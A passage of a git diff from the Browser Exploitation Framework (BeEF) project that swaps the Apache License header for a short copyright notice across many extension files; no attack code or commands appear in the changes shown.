-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Extension
diff --git a/extensions/console/lib/command_dispatcher/target.rb b/extensions/console/lib/command_dispatcher/target.rb
index 5a4fe0ec6..0eaf4deeb 100644
--- a/extensions/console/lib/command_dispatcher/target.rb
+++ b/extensions/console/lib/command_dispatcher/target.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Extension
diff --git a/extensions/console/lib/shellinterface.rb b/extensions/console/lib/shellinterface.rb
index 55869fae7..98b60941c 100644
--- a/extensions/console/lib/shellinterface.rb
+++ b/extensions/console/lib/shellinterface.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Extension
diff --git a/extensions/console/shell.rb b/extensions/console/shell.rb
index 89cc6b20d..84d523ebb 100644
--- a/extensions/console/shell.rb
+++ b/extensions/console/shell.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 require 'rex'
diff --git a/extensions/customhook/api.rb b/extensions/customhook/api.rb
index 90a47bdb9..d3fe850b6 100644
--- a/extensions/customhook/api.rb
+++ b/extensions/customhook/api.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Extension
diff --git a/extensions/customhook/config.yaml b/extensions/customhook/config.yaml
index 9daf85e72..fe677fc14 100644
--- a/extensions/customhook/config.yaml
+++ b/extensions/customhook/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     extension:
diff --git a/extensions/customhook/extension.rb b/extensions/customhook/extension.rb
index 089425f23..644c3be36 100644
--- a/extensions/customhook/extension.rb
+++ b/extensions/customhook/extension.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Extension
diff --git a/extensions/customhook/handler.rb b/extensions/customhook/handler.rb
index 04b601094..621333741 100644
--- a/extensions/customhook/handler.rb
+++ b/extensions/customhook/handler.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Extension
diff --git a/extensions/demos/api.rb b/extensions/demos/api.rb
index 1f3e883a8..543876bd9 100644
--- a/extensions/demos/api.rb
+++ b/extensions/demos/api.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Extension
diff --git a/extensions/demos/config.yaml b/extensions/demos/config.yaml
index 2cdbc00c7..d74ae8563 100644
--- a/extensions/demos/config.yaml
+++ b/extensions/demos/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     extension:
diff --git a/extensions/demos/extension.rb b/extensions/demos/extension.rb
index 635cea52d..c6684cf37 100644
--- a/extensions/demos/extension.rb
+++ b/extensions/demos/extension.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Extension
diff --git a/extensions/demos/html/butcher/jquery-1.5.min.js b/extensions/demos/html/butcher/jquery-1.5.min.js
index fe9eef546..86b5f7755 100644
--- a/extensions/demos/html/butcher/jquery-1.5.min.js
+++ b/extensions/demos/html/butcher/jquery-1.5.min.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*!
  * jQuery JavaScript Library v1.5
  * http://jquery.com/
diff --git a/extensions/evasion/config.yaml b/extensions/evasion/config.yaml
index 50140c4f4..e6f4d4eab 100644
--- a/extensions/evasion/config.yaml
+++ b/extensions/evasion/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     extension:
diff --git a/extensions/evasion/evasion.rb b/extensions/evasion/evasion.rb
index aaf3019d9..360bbd72c 100644
--- a/extensions/evasion/evasion.rb
+++ b/extensions/evasion/evasion.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module Extension
diff --git a/extensions/evasion/extension.rb b/extensions/evasion/extension.rb
index e7e5c25d5..f7b7a045b 100644
--- a/extensions/evasion/extension.rb
+++ b/extensions/evasion/extension.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Extension
diff --git a/extensions/evasion/helper.rb b/extensions/evasion/helper.rb
index 68eb9c3b0..4de2b7ea6 100644
--- a/extensions/evasion/helper.rb
+++ b/extensions/evasion/helper.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module Extension
diff --git a/extensions/evasion/obfuscation/base_64.rb b/extensions/evasion/obfuscation/base_64.rb
index cf8a55309..6033fd86d 100644
--- a/extensions/evasion/obfuscation/base_64.rb
+++ b/extensions/evasion/obfuscation/base_64.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module Extension
diff --git a/extensions/evasion/obfuscation/minify.rb b/extensions/evasion/obfuscation/minify.rb
index 048d5d53b..f70dc835b 100644
--- a/extensions/evasion/obfuscation/minify.rb
+++ b/extensions/evasion/obfuscation/minify.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module Extension
diff --git a/extensions/evasion/obfuscation/scramble.rb b/extensions/evasion/obfuscation/scramble.rb
index d14ca5cff..4671a8359 100644
--- a/extensions/evasion/obfuscation/scramble.rb
+++ b/extensions/evasion/obfuscation/scramble.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module Extension
diff --git a/extensions/evasion/obfuscation/whitespace.rb b/extensions/evasion/obfuscation/whitespace.rb
index 8c20217f4..8c6d8cc10 100644
--- a/extensions/evasion/obfuscation/whitespace.rb
+++ b/extensions/evasion/obfuscation/whitespace.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module Extension
diff --git a/extensions/events/api.rb b/extensions/events/api.rb
index 30300b591..151c24f08 100644
--- a/extensions/events/api.rb
+++ b/extensions/events/api.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Extension
diff --git a/extensions/events/config.yaml b/extensions/events/config.yaml
index efe6cddeb..5806d81d5 100644
--- a/extensions/events/config.yaml
+++ b/extensions/events/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     extension:
diff --git a/extensions/events/extension.rb b/extensions/events/extension.rb
index 1b35b0cbb..b54117abe 100644
--- a/extensions/events/extension.rb
+++ b/extensions/events/extension.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Extension
diff --git a/extensions/events/handler.rb b/extensions/events/handler.rb
index a6e83edb5..451f38fcc 100644
--- a/extensions/events/handler.rb
+++ b/extensions/events/handler.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Extension
diff --git a/extensions/ipec/config.yaml b/extensions/ipec/config.yaml
index 28b9dde4b..44b3d38b9 100644
--- a/extensions/ipec/config.yaml
+++ b/extensions/ipec/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     extension:
diff --git a/extensions/ipec/extension.rb b/extensions/ipec/extension.rb
index b8464e0d6..d1d1d1d53 100644
--- a/extensions/ipec/extension.rb
+++ b/extensions/ipec/extension.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Extension
diff --git a/extensions/ipec/junk_calculator.rb b/extensions/ipec/junk_calculator.rb
index 718e40de2..9db80ecd5 100644
--- a/extensions/ipec/junk_calculator.rb
+++ b/extensions/ipec/junk_calculator.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module Extension
diff --git a/extensions/ipec/models/ipec_exploits.rb b/extensions/ipec/models/ipec_exploits.rb
index 789fdcf36..e219e7b11 100644
--- a/extensions/ipec/models/ipec_exploits.rb
+++ b/extensions/ipec/models/ipec_exploits.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module Core
diff --git a/extensions/ipec/models/ipec_exploits_run.rb b/extensions/ipec/models/ipec_exploits_run.rb
index 24ebcaa5b..99541bc6b 100644
--- a/extensions/ipec/models/ipec_exploits_run.rb
+++ b/extensions/ipec/models/ipec_exploits_run.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module Core
diff --git a/extensions/ipec/rest/ipec.rb b/extensions/ipec/rest/ipec.rb
index 00b3eff9a..7f87e5cae 100644
--- a/extensions/ipec/rest/ipec.rb
+++ b/extensions/ipec/rest/ipec.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 module BeEF
diff --git a/extensions/metasploit/api.rb b/extensions/metasploit/api.rb
index 116bc9f1d..245a8563e 100644
--- a/extensions/metasploit/api.rb
+++ b/extensions/metasploit/api.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module Extension
diff --git a/extensions/metasploit/config.yaml b/extensions/metasploit/config.yaml
index 160a7fe0d..29bfebb8c 100644
--- a/extensions/metasploit/config.yaml
+++ b/extensions/metasploit/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 # Enable MSF by changing extension:metasploit:enable to true
 # Then set msf_callback_host to be the public IP of your MSF server
diff --git a/extensions/metasploit/extension.rb b/extensions/metasploit/extension.rb
index cdb54d7e6..3ea6db50d 100644
--- a/extensions/metasploit/extension.rb
+++ b/extensions/metasploit/extension.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
